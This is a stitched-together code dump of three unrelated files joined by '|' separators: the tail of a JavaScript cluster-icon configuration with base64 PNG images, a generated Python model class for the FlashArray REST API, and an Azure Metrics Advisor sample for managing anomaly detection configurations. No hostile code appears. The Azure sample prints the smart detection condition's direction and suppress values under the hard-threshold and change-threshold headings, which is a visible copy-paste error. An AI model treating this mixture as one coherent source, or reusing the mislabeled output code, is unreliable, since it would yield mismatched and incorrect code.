tdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8Ut8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8Ut8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
},
{
url: 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADUAAAA1CAYAAADh5qNwAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyppVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTMyIDc5LjE1OTI4NCwgMjAxNi8wNC8xOS0xMzoxMzo0MCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTUuNSAoTWFjaW50b3NoKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo1QzFBQ0JGREEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo1QzFBQ0JGRUEwNzQxMUU3ODk0RUFCOTlGQUI3QUM5NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjVDMUFDQkZCQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjVDMUFDQkZDQTA3NDExRTc4OTRFQUI5OUZBQjdBQzk2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+R2qhJAAABbJJREFUeNrcWl9sU1UY/9asywZr1wHrNsPixsaUyZaJTAFBiCRmgQThhRcHuAcMiZrIg39efPLB6IP6gCbwgsY/jzJNJJKh6YQxAooLMAWGYQbi2o7o1nV2aZvO71dO9dzT03brvaXXfckvdzv33u/8fqfnft/5VzI3N0eLzUog6q0TnywaQW/uOUClFvuEvycYTzHWMloZDzCWMqoYU4wZxh+MG4wRxiBjiBG1koRZczCeZhxgPMtwZXm2SgBC10vl04yvGOgy3zMSZgmZaZB9jKuMfkZPDkHZzCXe7xf+9ptpcO2Lxz+7mfWl3p6WLXz5SHQxq22N+MVeZbzIXH7IwcVc92MH5Xx5j3EIQUb3zN+ROI37IxQIztJUKEqhUIzi8QRFYwkqczqotNRBbreTqtxlVOstp/q6ClpSoaWBBvNxnUf5epjFzVr+TbHzRr6cYHSq9xKJObr1e5hGb4bIH4xQpiwBYQCE+wMRuj46RSXcNLXeCmptdlNTYyU5HIa2KhENuIHr38PCxiwTxQ47+PIto169N/pbiIav/EXhcCyvvoYGgEDg0uU/qbO9mlazQMXQkOeYRzcLu2w6ULCjR/kyoAoKTcfom1N36OxQMG9BqsEP/MEv/CuG+geYT7spUeygmS+nGB65HF3t65O3KTgxS4Uw+IX/W2Nh9RZ4nGReTXmJ4heX8OVLRo1cPnJtknxn/BSLJaiQBv++s34a+XVSvbWS0Sf4LfiXep/RYRDEFVz48e59HfZc+OkuXU0X1iH4zV8Ut8J2vhxUuxwqKIZd5HpRv2IHBc95iUJEPCLnIeSawfPBog5UUT/ynhLuj+giuE7U84yH5YIzQ4GCf0Pz+cYQGRUDz95covD/62oeKlSUyycqgo9ir6k6VFEYbbfIIwUkVjvZMCdo8JIMfLdnE7XfEBw4T1iVWK2y8Excl7/2ZRLlZOyWb95I/6ltYRpeuwX/NFFd8nwIg84AD07taOAFfsp8rEsnapv8FKYPdl2TAS/wU2yrTlSbGmnsbBjVK/aITpQhN01ORm0tanIqqstZaaIa5CembRb1dFFQsTqdqGp1lmpn04xwXJlCeraX7C7KrRNl6G9Op8PWojT8pnWiDOOhsv+fqJBO1G1DB6102lpU5dK0GYdfJ+q6YTHAU2ZrUZ6qNH7XdKJG5Ce8NeW2FlVXW6EW/aIT5ZOfwMqpnU3Dz6cTdVGOIFgKtuuvBV7KUnVY8NeG9D75yYdWV9lSlIZXn5yS1Lj4qfzPqsZKXZQpetQDr2y8VVHfMf7dx8FifWfHMluJAh9lEwF8T2cThbHHO3IBFuvt8m3VrCjXbR68S8rOo27Y8LEc82GbN3qLPmxC/Vs2eXW56bhaqGOKMf1LmGCmCrBB9uQGb1FFoX7wkCfAjJcF35yisD2Kb+uoXNb0YCV1rVtRFEHr1y1P1q/YMeZ5Wvd8tj51mPGzXLC2zUNdj91fYaivva1aLQavVzK9k1GU2GPdy5gwCFvjoW2b68hZWthvDP5RD+pT7A54ZdsDzsqMX0S47MaSgKErcp7YtbOBapYXJirC764dDcl61KUJxg7Bi/ISJYRdonvLT+OGaabLSTu7VyYjo1UJGn7gD36xg68Y6t/KfK7k8jMvNtg87u1p2UTK7jx21pE3mptcyaVgrJwGggtbL0zuztdUUGuLdnc+ZcMMa3fnhbAxFraR//yA8QJJ+1cg0rzKlUTyHMV4hAIT/52jiMUTyTUF5BqnfI6Ck3p9fcZzFKmwfQxBoSDnKKTgcYjFfcHXD0lz4gUEUwJNGuZ3OPEysNAXzRyNQ4M8x3iDlIVQk4YZ+NuMz3WJNZfhaJyZuIwK0RpY7n1GkAjn6WtGvA8/bcJvPF9iVoQtDCb7BRCyHqf0836IzW6x4gPhqfN+mIKfp3tn/ixbvLd6shQTBAeLOU4sWYxnaP8RYAArBAM3cLcJyQAAAABJRU5ErkJggg==',
height: 53,
width: 53,
textSize: '20',
textColor: '#fff'
}
]
});
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.10
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_10 import models
class VolumeGroupPost(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'destroyed': 'bool',
'qos': 'Qos',
'priority_adjustment': 'PriorityAdjustment',
'space': 'Space',
'time_remaining': 'int',
'volume_count': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'destroyed': 'destroyed',
'qos': 'qos',
'priority_adjustment': 'priority_adjustment',
'space': 'space',
'time_remaining': 'time_remaining',
'volume_count': 'volume_count'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
destroyed=None, # type: bool
qos=None, # type: models.Qos
priority_adjustment=None, # type: models.PriorityAdjustment
space=None, # type: models.Space
time_remaining=None, # type: int
volume_count=None, # type: int
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A user-specified name. The name must be locally unique and can be changed.
destroyed (bool): Destroy or recover a volume group. To destroy a volume group, patch to `true`. To recover a destroyed volume group, patch to `false`. If not specified, defaults to `false`.
qos (Qos)
priority_adjustment (PriorityAdjustment)
space (Space)
time_remaining (int): The amount of time left until the destroyed volume group is permanently eradicated, measured in milliseconds.
volume_count (int): The number of volumes in the volume group.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if destroyed is not None:
self.destroyed = destroyed
if qos is not None:
self.qos = qos
if priority_adjustment is not None:
self.priority_adjustment = priority_adjustment
if space is not None:
self.space = space
if time_remaining is not None:
self.time_remaining = time_remaining
if volume_count is not None:
self.volume_count = volume_count
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `VolumeGroupPost`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(VolumeGroupPost, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VolumeGroupPost):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: sample_detection_configuration.py
DESCRIPTION:
This sample demonstrates how to create, get, list, update, and delete anomaly detection configurations
under your Metrics Advisor account.
USAGE:
python sample_detection_configuration.py
Set the environment variables with your own values before running the sample:
1) METRICS_ADVISOR_ENDPOINT - the endpoint of your Azure Metrics Advisor service
2) METRICS_ADVISOR_SUBSCRIPTION_KEY - Metrics Advisor service subscription key
3) METRICS_ADVISOR_API_KEY - Metrics Advisor service API key
4) METRICS_ADVISOR_METRIC_ID - the ID of an metric from an existing data feed
"""
import os
def sample_create_detection_config():
# [START create_detection_config]
from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
from azure.ai.metricsadvisor.models import (
ChangeThresholdCondition,
HardThresholdCondition,
SmartDetectionCondition,
SuppressCondition,
MetricDetectionCondition,
AnomalyDetectionConfiguration
)
service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
api_key = os.getenv("METRICS_ADVISOR_API_KEY")
metric_id = os.getenv("METRICS_ADVISOR_METRIC_ID")
client = MetricsAdvisorAdministrationClient(service_endpoint,
MetricsAdvisorKeyCredential(subscription_key, api_key))
change_threshold_condition = ChangeThresholdCondition(
anomaly_detector_direction="Both",
change_percentage=20,
shift_point=10,
within_range=True,
suppress_condition=SuppressCondition(
min_number=5,
min_ratio=2
)
)
hard_threshold_condition = HardThresholdCondition(
anomaly_detector_direction="Up",
upper_bound=100,
suppress_condition=SuppressCondition(
min_number=2,
min_ratio=2
)
)
smart_detection_condition = SmartDetectionCondition(
anomaly_detector_direction="Up",
sensitivity=10,
suppress_condition=SuppressCondition(
min_number=2,
min_ratio=2
)
)
detection_configuration = AnomalyDetectionConfiguration(
name="my_detection_config",
metric_id=metric_id,
description="anomaly detection config for metric",
whole_series_detection_condition=MetricDetectionCondition(
cross_conditions_operator="OR",
change_threshold_condition=change_threshold_condition,
hard_threshold_condition=hard_threshold_condition,
smart_detection_condition=smart_detection_condition
)
)
detection_config = client.create_detection_configuration(detection_configuration)
return detection_config
# [END create_detection_config]
def sample_get_detection_config(detection_config_id):
# [START get_detection_config]
from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
api_key = os.getenv("METRICS_ADVISOR_API_KEY")
client = MetricsAdvisorAdministrationClient(service_endpoint,
MetricsAdvisorKeyCredential(subscription_key, api_key))
config = client.get_detection_configuration(detection_config_id)
print("Detection config name: {}".format(config.name))
print("Description: {}".format(config.description))
print("Metric ID: {}".format(config.metric_id))
print("\nDetection conditions specified for configuration...")
print("\nWhole Series Detection Conditions:\n")
conditions = config.whole_series_detection_condition
print("Use {} operator for multiple detection conditions".format(conditions.cross_conditions_operator))
print("Smart Detection Condition:")
print("- Sensitivity: {}".format(conditions.smart_detection_condition.sensitivity))
print("- Detection direction: {}".format(conditions.smart_detection_condition.anomaly_detector_direction))
print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
conditions.smart_detection_condition.suppress_condition.min_number,
conditions.smart_detection_condition.suppress_condition.min_ratio
))
print("Hard Threshold Condition:")
print("- Lower bound: {}".format(conditions.hard_threshold_condition.lower_bound))
print("- Upper bound: {}".format(conditions.hard_threshold_condition.upper_bound))
print("- Detection direction: {}".format(conditions.smart_detection_condition.anomaly_detector_direction))
print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
conditions.smart_detection_condition.suppress_condition.min_number,
conditions.smart_detection_condition.suppress_condition.min_ratio
))
print("Change Threshold Condition:")
print("- Change percentage: {}".format(conditions.change_threshold_condition.change_percentage))
print("- Shift point: {}".format(conditions.change_threshold_condition.shift_point))
print("- Detect anomaly if within range: {}".format(conditions.change_threshold_condition.within_range))
print("- Detection direction: {}".format(conditions.smart_detection_condition.anomaly_detector_direction))
print("- Suppress conditions: minimum number: {}; minimum ratio: {}".format(
conditions.smart_detection_condition.suppress_condition.min_number,
conditions.smart_detection_condition.suppress_condition.min_ratio
))
# [END get_detection_config]
def sample_list_detection_configs():
# [START list_detection_configs]
from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
api_key = os.getenv("METRICS_ADVISOR_API_KEY")
metric_id = os.getenv("METRICS_ADVISOR_METRIC_ID")
client = MetricsAdvisorAdministrationClient(service_endpoint,
MetricsAdvisorKeyCredential(subscription_key, api_key))
configs = client.list_detection_configurations(metric_id=metric_id)
for config in configs:
print("Detection config name: {}".format(config.name))
print("Description: {}".format(config.description))
print("Metric ID: {}\n".format(config.metric_id))
# [END list_detection_configs]
def sample_update_detection_config(detection_config):
# [START update_detection_config]
from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
from azure.ai.metricsadvisor.models import (
MetricSeriesGroupDetectionCondition,
MetricSingleSeriesDetectionCondition,
SmartDetectionCondition,
SuppressCondition
)
service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
api_key = os.getenv("METRICS_ADVISOR_API_KEY")
client = MetricsAdvisorAdministrationClient(service_endpoint,
MetricsAdvisorKeyCredential(subscription_key, api_key))
detection_config.name = "updated config name"
detection_config.description = "updated with more detection conditions"
smart_detection_condition = SmartDetectionCondition(
anomaly_detector_direction="Up",
sensitivity=10,
suppress_condition=SuppressCondition(
min_number=2,
min_ratio=2
)
)
updated = client.update_detection_configuration(
detection_config,
series_group_detection_conditions=[
MetricSeriesGroupDetectionCondition(
series_group_key={"city": "Seoul"},
smart_detection_condition=smart_detection_condition
)
],
series_detection_conditions=[
MetricSingleSeriesDetectionCondition(
series_key={"city": "Osaka", "category": "Cell Phones"},
smart_detection_condition=smart_detection_condition
)
]
)
print("Updated detection name: {}".format(updated.name))
print("Updated detection description: {}".format(updated.description))
print("Updated detection condition for series group: {}".format(
updated.series_group_detection_conditions[0].series_group_key
))
print("Updated detection condition for series: {}".format(
updated.series_detection_conditions[0].series_key
))
# [END update_detection_config]
def sample_delete_detection_config(detection_config_id):
# [START delete_detection_config]
from azure.core.exceptions import ResourceNotFoundError
from azure.ai.metricsadvisor import MetricsAdvisorKeyCredential, MetricsAdvisorAdministrationClient
service_endpoint = os.getenv("METRICS_ADVISOR_ENDPOINT")
subscription_key = os.getenv("METRICS_ADVISOR_SUBSCRIPTION_KEY")
api_key = os.getenv("METRICS_ADVISOR_API_KEY")
client = MetricsAdvisorAdministrationClient(service_endpoint,
MetricsAdvisorKeyCredential(subscription_key, api_key))
client.delete_detection_configuration(detection_config_id)
try:
client.get_detection_configuration(detection_config_id)
except ResourceNotFoundError:
print("Detection configuration successfully deleted.")
# [END delete_detection_config]
if __name__ == '__main__':
print("---Creating anomaly detection configuration...")
detection_config = sample_create_detection_config()
print("Anomaly detection configuration successfully created...")
print("\n---Get an anomaly detection configuration...")
sample_get_detection_config(detection_config.id)
print("\n---List anomaly detection configurations...")
sample_list_detection_configs()
print("\n---Update an anomaly detection configuration...")
sample_update_detection_config(detection_config)
print("\n---Delete an anomaly detection configuration...")
